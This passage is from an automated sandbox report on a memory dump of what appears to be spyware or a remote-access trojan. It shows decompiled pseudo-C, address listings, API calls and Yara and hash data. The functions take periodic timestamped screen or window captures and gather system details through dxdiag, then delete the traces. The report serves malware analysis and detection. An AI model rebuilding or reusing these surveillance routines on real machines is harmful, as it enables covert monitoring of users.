                      									__eax = E00741E49( &_v420, __edx, __eflags, 0);
                      									__esp = __esp - 0x18;
                      									__ecx = __esp;
                      									__eax = E0074EE3B(__edx);
                      									goto L103;
                      								case 0x2f:
                      									__ecx =  &_v420;
                      									__eax = E00741E49( &_v420, __edx, __eflags, 0);
                      									__esp = __esp - 0x18;
                      									__ecx = __esp;
                      									__eax = E00755B9C(__edx);
                      									L103:
                      									goto L126;
                      							}
                      						}
                      					}
                      				}
                      				L140:
                      			}

                      0x007533bf
                      0x00000000
                      0x00000000
                      0x00752630
                      0x00752639
                      0x0075263b
                      0x00752647
                      0x00752649
                      0x00000000
                      0x00000000
                      0x007526d1
                      0x007526d1
                      0x00000000
                      0x00000000
                      0x00752655
                      0x0075265e
                      0x00752660
                      0x0075266d
                      0x00000000
                      0x00000000
                      0x00752678
                      0x00000000
                      0x00000000
                      0x0075269f
                      0x0075267a
                      0x0075267a
                      0x0075267c
                      0x0075267c
                      0x00752685
                      0x00752687
                      0x00752694
                      0x00000000
                      0x00000000
                      0x007526a3
                      0x007526aa
                      0x007526b3
                      0x007526b5
                      0x007526c2
                      0x007526c8
                      0x007526cc
                      0x00000000
                      0x00000000
                      0x007526db
                      0x007526dd
                      0x007526e9
                      0x007526eb
                      0x007526f1
                      0x007526f5
                      0x007526fb
                      0x00752700
                      0x0075270a
                      0x0075271d
                      0x00752723
                      0x00752727
                      0x0075272c
                      0x00000000
                      0x00000000
                      0x00752737
                      0x0075273b
                      0x00752741
                      0x00752746
                      0x0075274b
                      0x00752751
                      0x00752759
                      0x0075275d
                      0x00752762
                      0x00752765
                      0x0075276d
                      0x00000000
                      0x0075276d
                      0x00000000
                      0x00000000
                      0x00752779
                      0x0075277b
                      0x00752787
                      0x00752795
                      0x00000000
                      0x00000000
                      0x007527a2
                      0x007527a6
                      0x007527ac
                      0x007527b1
                      0x007527b8
                      0x007527c1
                      0x007527c3
                      0x007527cf
                      0x007527d1
                      0x007527d9
                      0x007527e2
                      0x007527e4
                      0x007527ea
                      0x007527f0
                      0x007527f2
                      0x007527f8
                      0x007527f8
                      0x007527f8
                      0x00752800
                      0x00752808
                      0x0075280e
                      0x00752810
                      0x00752812
                      0x00000000
                      0x00000000
                      0x0075281d
                      0x0075281e
                      0x00752823
                      0x00752825
                      0x00752826
                      0x00752828
                      0x00752828
                      0x00000000
                      0x00000000
                      0x0075282b
                      0x0075282f
                      0x00752834
                      0x00752837
                      0x0075283a
                      0x0075283f
                      0x00752844
                      0x00000000
                      0x00000000
                      0x0075284e
                      0x00752853
                      0x00000000
                      0x00000000
                      0x0075285d
                      0x00752862
                      0x00000000
                      0x00000000
                      0x0075286e
                      0x00752872
                      0x00752878
                      0x0075287d
                      0x00752882
                      0x00000000
                      0x00000000
                      0x00752891
                      0x00752891
                      0x00752892
                      0x00752897
                      0x0075289d
                      0x007528a2
                      0x007528a5
                      0x007528a8
                      0x007528ad
                      0x007528b2
                      0x00000000
                      0x00000000
                      0x007528c2
                      0x007528c7
                      0x007528c9
                      0x007528ce
                      0x00752887
                      0x00752887
                      0x00000000
                      0x00000000
                      0x00752f9a
                      0x00752f9b
                      0x00752fa0
                      0x00752fa6
                      0x00752fa8
                      0x00752faa
                      0x00752faa
                      0x00000000
                      0x00000000
                      0x007528d2
                      0x007528d4
                      0x007528d9
                      0x007528df
                      0x007528e4
                      0x007528e9
                      0x007528ee
                      0x007528f3
                      0x007528f6
                      0x007528fb
                      0x007528fd
                      0x007528fe
                      0x007528ff
                      0x00752900
                      0x00752901
                      0x00752906
                      0x00752908
                      0x0075290d
                      0x00752910
                      0x00752912
                      0x00752917
                      0x0075291d
                      0x00752928
                      0x0075291f
                      0x0075291f
                      0x00752924
                      0x0075292f
                      0x00752931
                      0x0075293c
                      0x0075293e
                      0x00000000
                      0x00000000
                      0x00752948
                      0x0075294e
                      0x00752953
                      0x00000000
                      0x00000000
                      0x0075295d
                      0x0075295f
                      0x00752965
                      0x0075296b
                      0x00752970
                      0x00752973
                      0x00752976
                      0x0075297d
                      0x00752986
                      0x00752988
                      0x00752994
                      0x00752997
                      0x007529a0
                      0x007529a2
                      0x007529a8
                      0x007529af
                      0x007529b3
                      0x007529ba
                      0x007529bc
                      0x007529c2
                      0x007529c8
                      0x007529ca
                      0x007529cc
                      0x00000000
                      0x00000000
                      0x007529d9
                      0x007529da
                      0x007529df
                      0x007529f2
                      0x00000000
                      0x00000000
                      0x007529fd
                      0x007529fd
                      0x007529fe
                      0x00752a03
                      0x00752a09
                      0x00752a0e
                      0x00752a11
                      0x00752a14
                      0x00752a1b
                      0x00752a1f
                      0x00752a24
                      0x00752a27
                      0x00752a2f
                      0x00752a34
                      0x007528b7
                      0x007528b7
                      0x00000000
                      0x00000000
                      0x00752a3e
                      0x00752a47
                      0x00752a4f
                      0x00000000
                      0x00000000
                      0x00752a5a
                      0x00752a61
                      0x00000000
                      0x00752a6f
                      0x00752a6f
                      0x00752a75
                      0x00000000
                      0x00000000
                      0x00752a69
                      0x00752a69
                      0x00752a7b
                      0x00752a7b
                      0x007533f0
                      0x007533f5
                      0x007533f6
                      0x007533f8
                      0x007533fa
                      0x007533fa
                      0x007533ff
                      0x00753401
                      0x00753403
                      0x00753405
                      0x00753407
                      0x00753409
                      0x00753410
                      0x00753412
                      0x00753415
                      0x00753416
                      0x00753419
                      0x0075341b
                      0x0075341d
                      0x0075341e
                      0x00753421
                      0x00753426
                      0x00753429
                      0x00753429
                      0x0075342e
                      0x0075342f
                      0x00753431
                      0x00753436
                      0x00753439
                      0x00753439
                      0x0075343b
                      0x0075343d
                      0x0075343e
                      0x0075343e
                      0x0075343e
                      0x00753442
                      0x00753445
                      0x00753446
                      0x00753449
                      0x00753449
                      0x00753449
                      0x0075344a
                      0x0075344a
                      0x0075344d
                      0x00000000
                      0x00000000
                      0x00752a7c
                      0x00000000
                      0x00000000
                      0x00752a8e
                      0x00752a8e
                      0x00752a94
                      0x00000000
                      0x00000000
                      0x00752a88
                      0x00752a88
                      0x00752a96
                      0x00752a98
                      0x00752aa2
                      0x00752aa4
                      0x00752aab
                      0x00752aaf
                      0x00752ab6
                      0x00752ab8
                      0x00752abd
                      0x00752abf
                      0x00752ac4
                      0x00752aca
                      0x00752acb
                      0x00752acc
                      0x00752ad5
                      0x00752ad8
                      0x00752ae1
                      0x00752ae3
                      0x00752ae8
                      0x00752ae9
                      0x00752aea
                      0x00752af0
                      0x00752af2
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00752b1c
                      0x00752b1c
                      0x00752b22
                      0x00000000
                      0x00000000
                      0x00752b16
                      0x00752b16
                      0x00752b26
                      0x00752b2f
                      0x00752b31
                      0x00752b38
                      0x00752b3c
                      0x00752b43
                      0x00752b45
                      0x00752b4a
                      0x00752b4c
                      0x00752b51
                      0x00752b57
                      0x00752b5b
                      0x00752b62
                      0x00752b66
                      0x00752b68
                      0x00752b6d
                      0x00752b70
                      0x00752b73
                      0x00752b78
                      0x00752b7a
                      0x00752b7f
                      0x00752b82
                      0x00752b84
                      0x00752af8
                      0x00752af8
                      0x00752afb
                      0x00752aff
                      0x00752b07
                      0x00752b0c
                      0x00752b0c
                      0x00000000
                      0x00000000
                      0x00752b91
                      0x00752b9a
                      0x00752b9c
                      0x00752ba8
                      0x00752bad
                      0x00752bb9
                      0x00752bbb
                      0x00752bc1
                      0x00752bc3
                      0x00752bcd
                      0x00752bd6
                      0x00000000
                      0x00000000
                      0x00752be1
                      0x00752be6
                      0x00752be8
                      0x00752bed
                      0x00752bf2
                      0x00752bf7
                      0x00752bf9
                      0x00752bfe
                      0x00752c02
                      0x00752c03
                      0x00752c05
                      0x00752c1d
                      0x00752c22
                      0x00752c27
                      0x00752c29
                      0x00752c2e
                      0x00752c32
                      0x00752c33
                      0x00752c35
                      0x00752c50
                      0x00752c55
                      0x00752c5a
                      0x00752c5c
                      0x00752c61
                      0x00752c63
                      0x00752c98
                      0x00752c9f
                      0x00752ca6
                      0x00752caa
                      0x00752cac
                      0x00752cb1
                      0x00752cb6
                      0x00752cb8
                      0x00752cbd
                      0x00752cbe
                      0x00752cc0
                      0x00752cc6
                      0x00752cca
                      0x00752ccf
                      0x00752cd4
                      0x00752cd6
                      0x00752cdb
                      0x00752cdd
                      0x00752ce3
                      0x00752ce4
                      0x00752ce5
                      0x00000000
                      0x00752ce5
                      0x00752cc2
                      0x00752cc2
                      0x00752cc3
                      0x00752ce7
                      0x00752ce7
                      0x00752ce7
                      0x00752c65
                      0x00752c65
                      0x00752c68
                      0x00752c71
                      0x00752c73
                      0x00752c79
                      0x00752c7e
                      0x00752c7e
                      0x00000000
                      0x00752c7e
                      0x00752c37
                      0x00752c3e
                      0x00752c40
                      0x00752c46
                      0x00752c4b
                      0x00000000
                      0x00752c4b
                      0x00752c07
                      0x00752c0e
                      0x00752c10
                      0x00752c16
                      0x00752c81
                      0x00752c81
                      0x00752c83
                      0x00752c83
                      0x00000000
                      0x00000000
                      0x00752d88
                      0x00752d89
                      0x00752d8f
                      0x00752d91
                      0x00752d9f
                      0x00752da9
                      0x00752db1
                      0x00752db7
                      0x00752dbe
                      0x00752dc2
                      0x00752dc6
                      0x00752dcb
                      0x00752dce
                      0x00752dd2
                      0x00752dd4
                      0x00752dd9
                      0x00752ddb
                      0x00752de0
                      0x00753189
                      0x00753189
                      0x0075318d
                      0x0075318d
                      0x0075318d
                      0x00000000
                      0x00000000
                      0x00752cf5
                      0x00752cf7
                      0x00752cfd
                      0x00752d04
                      0x00752d0d
                      0x00752d0f
                      0x00752d14
                      0x00752d23
                      0x00752d26
                      0x00752d2d
                      0x00752d31
                      0x00752d38
                      0x00752d3a
                      0x00752d41
                      0x00752d4a
                      0x00752d65
                      0x00000000
                      0x00752d65
                      0x00000000
                      0x00000000
                      0x00752d6e
                      0x00752d74
                      0x00752d76
                      0x00752d7c
                      0x00752d82
                      0x00752d82
                      0x00000000
                      0x00752d82
                      0x00000000
                      0x00000000
                      0x00752dea
                      0x00752dec
                      0x00752df6
                      0x00752df8
                      0x00752dfe
                      0x00752e02
                      0x00752e09
                      0x00752e0b
                      0x00752e10
                      0x00752e12
                      0x00752e14
                      0x00000000
                      0x00000000
                      0x00752e1e
                      0x00752e22
                      0x00752e26
                      0x00752e2a
                      0x00752e2e
                      0x00752e37
                      0x00752e39
                      0x00752e3e
                      0x00752e42
                      0x00752e44
                      0x00752e4a
                      0x00752e4d
                      0x00752e53
                      0x00752e57
                      0x00752e64
                      0x00752817
                      0x00752817
                      0x00752817
                      0x00000000
                      0x00000000
                      0x00752e6e
                      0x00000000
                      0x00000000
                      0x00752e7a
                      0x00752e7e
                      0x00752e83
                      0x00752e86
                      0x00752e8e
                      0x00000000
                      0x00000000
                      0x00752e9a
                      0x00752e9e
                      0x00752ea3
                      0x00752ea6
                      0x00752eae
                      0x00000000
                      0x00000000
                      0x00752eba
                      0x00752ebe
                      0x00752ec3
                      0x00752ec6
                      0x00752ece
                      0x00000000
                      0x00000000
                      0x00752ed8
                      0x00752ed9
                      0x00752ede
                      0x00752ee0
                      0x00752ee6
                      0x00752ee8
                      0x00752eee
                      0x00752ef0
                      0x00752efa
                      0x00752f01
                      0x00752f02
                      0x00752f0d
                      0x00752f0f
                      0x00752f1a
                      0x00752f24
                      0x00752f26
                      0x00000000
                      0x00000000
                      0x00752f32
                      0x00752f36
                      0x00752f3b
                      0x00752f3e
                      0x00752f46
                      0x00000000
                      0x00000000
                      0x00752f7c
                      0x00752f80
                      0x00752f85
                      0x00752f88
                      0x00752f90
                      0x007530e5
                      0x00000000
                      0x00000000
                      0x00752454
                      0x0075244c
                      0x00752442
                      0x00000000

                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: CountEventTick
                      • String ID: 8Et
                      • API String ID: 180926312-257909599
                      • Opcode ID: a395c304133d9bba73f2d5d32bebd5a9afa50e3acbbbb3d1901d7f5347ddb164
                      • Instruction ID: 01a06eae8bf0f879c0b22897177b6dc0894093215801c7755edb1d3547f05094
                      • Opcode Fuzzy Hash: a395c304133d9bba73f2d5d32bebd5a9afa50e3acbbbb3d1901d7f5347ddb164
                      • Instruction Fuzzy Hash: 29E17F31608300DBC614F770D85FBEE76A8AF95701F80492DB946971E2EF6C9A4DC792
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 85%
                      			E00755938() {
                      				intOrPtr* _t42;
                      				void* _t45;
                      				char* _t54;
                      				void* _t72;
                      				long _t78;
                      				void* _t83;
                      				struct _SECURITY_ATTRIBUTES* _t85;
                      				struct _SECURITY_ATTRIBUTES* _t92;
                      				void* _t131;
                      				void* _t132;
                      				void* _t140;
                      				void* _t141;
                      				void* _t146;
                      				intOrPtr _t147;
                      				void* _t148;
                      				void* _t149;
                      				void* _t150;
                      
                      				E007910A8(E0079265E, _t146);
                      				_push(_t141);
                      				 *((intOrPtr*)(_t146 - 0x10)) = _t147;
                      				_t92 = 0;
                      				 *((intOrPtr*)(_t146 - 4)) = 0;
                      				_t149 =  *0x7abea0 - _t92; // 0x0
                      				if(_t149 == 0) {
                      					_t147 = _t147 - 0xc;
                      					_t131 = _t146 - 0x68;
                      					E007543BF(_t131);
                      					__imp__GdiplusStartup(0x7abea0, _t131, 0);
                      				}
                      				_t150 =  *0x7abd70 - _t92; // 0x0
                      				if(_t150 == 0) {
                      					E00741EFA(0x7ac898, _t132, _t141, E00754E7E(_t146 - 0x40));
                      					E00741EF0();
                      				}
                      				_t42 = E00741F95(E00741E49(0x7ac578, _t132, _t150, 0x19));
                      				_t45 = E00741EEB(E007572DA(_t146 - 0x58, E00741E49(0x7ac578, _t132, _t150, 0x1a)));
                      				_t134 =  *_t42;
                      				E00741EFA(0x7ac880,  *_t42, 0x7ac880, E0075805B(_t146 - 0x40,  *_t42, _t45));
                      				E00741EF0();
                      				E00741EF0();
                      				CreateDirectoryW(E00741EEB(0x7ac880), _t92);
                      				E00741F6D(_t92, _t146 - 0xb0);
                      				E00741F6D(_t92, _t146 - 0x80);
                      				 *(_t146 - 0x11) = _t92;
                      				 *0x7abd6b = 1;
                      				_t54 =  *((intOrPtr*)(_t146 + 8));
                      				_t145 =  !=  ? L"time_%04i%02i%02i_%02i%02i%02i" : L"wnd_%04i%02i%02i_%02i%02i%02i";
                      				 *(_t146 - 0x18) =  !=  ? L"time_%04i%02i%02i_%02i%02i%02i" : L"wnd_%04i%02i%02i_%02i%02i%02i";
                      				_t140 = Sleep;
                      				L6:
                      				while(1) {
                      					if( *_t54 != 1) {
                      						L11:
                      						GetLocalTime(_t146 - 0x28);
                      						_push( *(_t146 - 0x1c) & 0x0000ffff);
                      						_push( *(_t146 - 0x1e) & 0x0000ffff);
                      						_push( *(_t146 - 0x20) & 0x0000ffff);
                      						_push( *(_t146 - 0x22) & 0x0000ffff);
                      						_push( *(_t146 - 0x26) & 0x0000ffff);
                      						E00754398(_t146 - 0x2b8, _t145,  *(_t146 - 0x28) & 0x0000ffff);
                      						_t147 = _t147 + 0x20;
                      						E00741EFA(_t146 - 0x80, _t66, _t145, E007430A6(_t92, _t146 - 0x58, E007430A6(_t92, _t146 - 0x40, E00747514(_t146 - 0x98, 0x7ac880, __eflags, "\\"), _t140, __eflags, _t146 - 0x2b8), _t140, __eflags, "."));
                      						E00741EF0();
                      						E00741EF0();
                      						E00741EF0();
                      						_t72 = E00741EEB(_t146 - 0x80);
                      						_t134 =  *((intOrPtr*)( *((intOrPtr*)(_t146 + 8)) + 1));
                      						E0075576E(_t72,  *((intOrPtr*)( *((intOrPtr*)(_t146 + 8)) + 1)), __eflags);
                      						__eflags =  *((char*)( *((intOrPtr*)(_t146 + 8))));
                      						if(__eflags != 0) {
                      							_t92 = 0;
                      							 *(_t146 - 0x11) = 0;
                      							_t78 = E00776769(_t75, E00741F95(E00741E49(0x7ac578, _t134, __eflags, 0x18))) * 0x3e8;
                      							__eflags = _t78;
                      						} else {
                      							_t78 = E00776769(_t79, E00741F95(E00741E49(0x7ac578, _t134, __eflags, 0x15))) * 0xea60;
                      						}
                      						Sleep(_t78);
                      						_t54 =  *((intOrPtr*)(_t146 + 8));
                      						continue;
                      					}
                      					_t145 = L"wnd_%04i%02i%02i_%02i%02i%02i";
                      					 *(_t146 - 0x18) = L"wnd_%04i%02i%02i_%02i%02i%02i";
                      					while(1) {
                      						_t153 = _t92;
                      						if(_t92 != 0) {
                      							goto L11;
                      						}
                      						_t83 = E00741F95(E00741E49(0x7ac578, _t134, _t153, 0x17));
                      						_t148 = _t147 - 0x18;
                      						E0074427F(_t92, _t148, _t83);
                      						_t85 = E00757ABF(0, _t134);
                      						_t147 = _t148 + 0x18;
                      						_t92 = _t85;
                      						 *(_t146 - 0x11) = _t92;
                      						if(_t92 != 0) {
                      							goto L11;
                      						}
                      						Sleep(0x3e8);
                      					}
                      					goto L11;
                      				}
                      			}

                      APIs
                      • __EH_prolog.LIBCMT ref: 0075593D
                      • GdiplusStartup.GDIPLUS(007ABEA0,?,00000000), ref: 0075596F
                        • Part of subcall function 00747514: char_traits.LIBCPMT ref: 0074752F
                        • Part of subcall function 0075576E: DeleteFileW.KERNEL32(00000000,0000001B), ref: 00755858
                      • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 007559FB
                      • Sleep.KERNEL32(000003E8), ref: 00755A81
                      • GetLocalTime.KERNEL32(?), ref: 00755A89
                      • Sleep.KERNEL32(00000000,00000018,00000000), ref: 00755B78
                      Strings
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: Sleep$CreateDeleteDirectoryFileGdiplusH_prologLocalStartupTimechar_traits
                      • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                      • API String ID: 649275306-3790400642
                      • Opcode ID: 8ffbb10cc62d5628357d0f07a1ee444002d4eab3320a61653dcb2281888556a8
                      • Instruction ID: 704bde8e68b62a85389c231d677695a6fe637731e2dfae49ab3506c772f8aae3
                      • Opcode Fuzzy Hash: 8ffbb10cc62d5628357d0f07a1ee444002d4eab3320a61653dcb2281888556a8
                      • Instruction Fuzzy Hash: 2C51A471A00258EACB04FBB4DC6A9FE7B79AF55301F804129F905AB192DF7C5E89C760
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0079067F), ref: 0078FB57
                      Strings
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: DecodePointer
                      • String ID: acos$asin$exp$log$log10$pow$sqrt
                      • API String ID: 3527080286-3064271455
                      • Opcode ID: aa03f84800add098559e592342249f162038e097ed80b5fb6a9d368f0e6cc4fd
                      • Instruction ID: 6017bec1623172a7ca06c13e1556260c3aac35decb39e7d530f86f0af0e52564
                      • Opcode Fuzzy Hash: aa03f84800add098559e592342249f162038e097ed80b5fb6a9d368f0e6cc4fd
                      • Instruction Fuzzy Hash: 83519FB094060DDBCF10EF68E9585ADBFB4FF49304F6041A5D981AB264DB3D8E25CB29
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 73%
                      			E00784B6E(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
                      				signed int _v8;
                      				signed char _v15;
                      				char _v16;
                      				void _v24;
                      				short _v28;
                      				char _v31;
                      				void _v32;
                      				char _v36;
                      				intOrPtr _v40;
                      				void* _v44;
                      				signed int _v48;
                      				signed char* _v52;
                      				long _v56;
                      				int _v60;
                      				signed int _t78;
                      				signed int _t80;
                      				int _t86;
                      				void* _t94;
                      				long _t97;
                      				void _t105;
                      				void* _t112;
                      				signed int _t116;
                      				signed int _t118;
                      				signed char _t123;
                      				signed char _t128;
                      				intOrPtr _t129;
                      				signed int _t131;
                      				signed char* _t133;
                      				intOrPtr* _t135;
                      				signed int _t136;
                      				void* _t137;
                      
                      				_t78 =  *0x7aa00c; // 0x67a7e35e
                      				_v8 = _t78 ^ _t136;
                      				_t80 = _a8;
                      				_t118 = _t80 >> 6;
                      				_t116 = (_t80 & 0x0000003f) * 0x30;
                      				_t133 = _a12;
                      				_v52 = _t133;
                      				_v48 = _t118;
                      				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x7ab800 + _t118 * 4)) + _t116 + 0x18));
                      				_v40 = _a16 + _t133;
                      				_t86 = GetConsoleCP();
                      				_t135 = _a4;
                      				_v60 = _t86;
                      				 *_t135 = 0;
                      				 *((intOrPtr*)(_t135 + 4)) = 0;
                      				 *((intOrPtr*)(_t135 + 8)) = 0;
                      				while(_t133 < _v40) {
                      					_v28 = 0;
                      					_v31 =  *_t133;
                      					_t129 =  *((intOrPtr*)(0x7ab800 + _v48 * 4));
                      					_t123 =  *(_t129 + _t116 + 0x2d);
                      					if((_t123 & 0x00000004) == 0) {
                      						if(( *(E0077F3A5(_t116, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
                      							_push(1);
                      							_push(_t133);
                      							goto L8;
                      						} else {
                      							if(_t133 >= _v40) {
                      								_t131 = _v48;
                      								 *((char*)( *((intOrPtr*)(0x7ab800 + _t131 * 4)) + _t116 + 0x2e)) =  *_t133;
                      								 *( *((intOrPtr*)(0x7ab800 + _t131 * 4)) + _t116 + 0x2d) =  *( *((intOrPtr*)(0x7ab800 + _t131 * 4)) + _t116 + 0x2d) | 0x00000004;
                      								 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
                      							} else {
                      								_t112 = E00783630( &_v28, _t133, 2);
                      								_t137 = _t137 + 0xc;
                      								if(_t112 != 0xffffffff) {
                      									_t133 =  &(_t133[1]);
                      									goto L9;
                      								}
                      							}
                      						}
                      					} else {
                      						_t128 = _t123 & 0x000000fb;
                      						_v16 =  *((intOrPtr*)(_t129 + _t116 + 0x2e));
                      						_push(2);
                      						_v15 = _t128;
                      						 *(_t129 + _t116 + 0x2d) = _t128;
                      						_push( &_v16);
                      						L8:
                      						_push( &_v28);
                      						_t94 = E00783630();
                      						_t137 = _t137 + 0xc;
                      						if(_t94 != 0xffffffff) {
                      							L9:
                      							_t133 =  &(_t133[1]);
                      							_t97 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
                      							_v56 = _t97;
                      							if(_t97 != 0) {
                      								_t45 =  &_v36; // 0x7852e3
                      								if(WriteFile(_v44,  &_v24, _t97, _t45, 0) == 0) {
                      									L19:
                      									 *_t135 = GetLastError();
                      								} else {
                      									 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 8)) - _v52 + _t133;
                      									if(_v36 >= _v56) {
                      										if(_v31 != 0xa) {
                      											goto L16;
                      										} else {
                      											_t105 = 0xd;
                      											_v32 = _t105;
                      											_t55 =  &_v36; // 0x7852e3
                      											if(WriteFile(_v44,  &_v32, 1, _t55, 0) == 0) {
                      												goto L19;
                      											} else {
                      												if(_v36 >= 1) {
                      													 *((intOrPtr*)(_t135 + 8)) =  *((intOrPtr*)(_t135 + 8)) + 1;
                      													 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
                      													goto L16;
                      												}
                      											}
                      										}
                      									}
                      								}
                      							}
                      						}
                      					}
                      					goto L20;
                      					L16:
                      				}
                      				L20:
                      				return E0076FD1B(_v8 ^ _t136);
                      			}

                      APIs
                      • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,007852E3,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 00784BB0
                      • __fassign.LIBCMT ref: 00784C2B
                      • __fassign.LIBCMT ref: 00784C46
                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 00784C6C
                      • WriteFile.KERNEL32(?,FF8BC35D,00000000,Rx,00000000,?,?,?,?,?,?,?,?,?,007852E3,?), ref: 00784C8B
                      • WriteFile.KERNEL32(?,?,00000001,Rx,00000000,?,?,?,?,?,?,?,?,?,007852E3,?), ref: 00784CC4
                      Strings
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                      • String ID: Rx
                      • API String ID: 1324828854-845304388
                      • Opcode ID: 7569778cda244fde1790649311bbf26b053fb4882dea88b516b7ee93dcd45035
                      • Instruction ID: 812a42827fa0981ea2b01e5275949dedf48a73a3099d07228c349b86f94e701c
                      • Opcode Fuzzy Hash: 7569778cda244fde1790649311bbf26b053fb4882dea88b516b7ee93dcd45035
                      • Instruction Fuzzy Hash: F651E671A0024AAFCB10DFA8DC89AEEBBF8FF49300F14415AE556E7251E778D941CB64
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 76%
                      			E00753673(void* __ecx, void* __eflags, char _a4) {
                      				char _v28;
                      				char _v52;
                      				char _v76;
                      				char _v180;
                      				void* __ebx;
                      				void* __edi;
                      				void* __esi;
                      				void* __ebp;
                      				void* _t35;
                      				void* _t46;
                      				void* _t54;
                      				void* _t55;
                      				void* _t90;
                      				void* _t92;
                      				void* _t94;
                      				void* _t95;
                      
                      				_t97 = __eflags;
                      				E007430A6(_t54,  &_v76, E0074427F(_t54,  &_v52, E0077987F(_t54, __ecx, __eflags, L"temp")), _t90, _t97, L"\\sysinfo.txt");
                      				E00741EF0();
                      				_t55 = 0;
                      				ShellExecuteW(0, L"open", L"dxdiag", E00741EEB(E00749E69( &_v52, L"/t ", 0,  &_v76)), 0, 0);
                      				E00741EF0();
                      				E007420D5(0,  &_v28);
                      				_t92 = 0;
                      				do {
                      					_t35 = E00741EEB( &_v76);
                      					_t87 =  &_v28;
                      					E007579DC(_t35,  &_v28);
                      					Sleep(0x64);
                      					_t92 = _t92 + 1;
                      				} while (E00749DB5() != 0 && _t92 < 0x4b0);
                      				if(E00749DB5() == 0) {
                      					DeleteFileW(E00741EEB( &_v76));
                      					E0074484E(_t55,  &_v180, 1);
                      					_t95 = _t94 - 0x10;
                      					_t93 = 0x7abacc;
                      					asm("movsd");
                      					asm("movsd");
                      					asm("movsd");
                      					asm("movsd");
                      					_t46 = E00744A08(_t87);
                      					_t102 = _t46;
                      					if(_t46 != 0) {
                      						_t93 = _t95 - 0x18;
                      						E00742F93(_t55, _t95 - 0x18, E00742FB7( &_v52,  &_a4, 0x7ac238), _t102,  &_v28);
                      						_push(0x97);
                      						E00744AA4(_t55,  &_v180, _t49, _t102);
                      						E00741FC7();
                      						E00744E0B( &_v180);
                      						_t55 = 1;
                      					}
                      					E00744E2F(_t55,  &_v180, _t93);
                      				}
                      				E00741FC7();
                      				E00741EF0();
                      				E00741FC7();
                      				return _t55;
                      			}

                      APIs
                        • Part of subcall function 00749E69: char_traits.LIBCPMT ref: 00749E79
                      • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 007536D4
                        • Part of subcall function 007579DC: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,00000000,00000000,?,00744230,0079F464), ref: 007579F9
                      • Sleep.KERNEL32(00000064), ref: 00753700
                      • DeleteFileW.KERNEL32(00000000), ref: 00753734
                      Strings
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: File$CreateDeleteExecuteShellSleepchar_traits
                      • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                      • API String ID: 2701014334-2001430897
                      • Opcode ID: ee6c5af89efab2af723abd6c36b5589f27df1e5f4cb86bfa7738dc5873327c78
                      • Instruction ID: 9824d8411f2ce8e63fe983cd46f24314284df2cc1df3c0f282ff6f1ddd2bea54
                      • Opcode Fuzzy Hash: ee6c5af89efab2af723abd6c36b5589f27df1e5f4cb86bfa7738dc5873327c78
                      • Instruction Fuzzy Hash: E7319371910218EBCB14FBA4DC9AEFF7735AF51300F800529F90567192EF685A8ACA91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 91%
                      			E0074EAF4(void* __ebx, void* __edx, void* __edi, void* __eflags, intOrPtr _a4) {
                      				void* _v8;
                      				char _v12;
                      				char _v28;
                      				intOrPtr _v36;
                      				intOrPtr* _t34;
                      				void* _t39;
                      				intOrPtr* _t41;
                      				intOrPtr* _t42;
                      
                      				E00770058( &_v12, 0);
                      				_t39 =  *0x7adb88;
                      				_v8 = _t39;
                      				_t41 = E0074BA23(_a4, E0074B94C(0x7add40));
                      				if(_t41 != 0) {
                      					L5:
                      					E007700B0( &_v12);
                      					return _t41;
                      				} else {
                      					if(_t39 == 0) {
                      						__eflags = E0074EBBB(__ebx, __edx,  &_v8, _a4) - 0xffffffff;
                      						if(__eflags == 0) {
                      							_t9 =  &_v28; // 0x74e459
                      							_t34 = _t9;
                      							E0074B812(_t34);
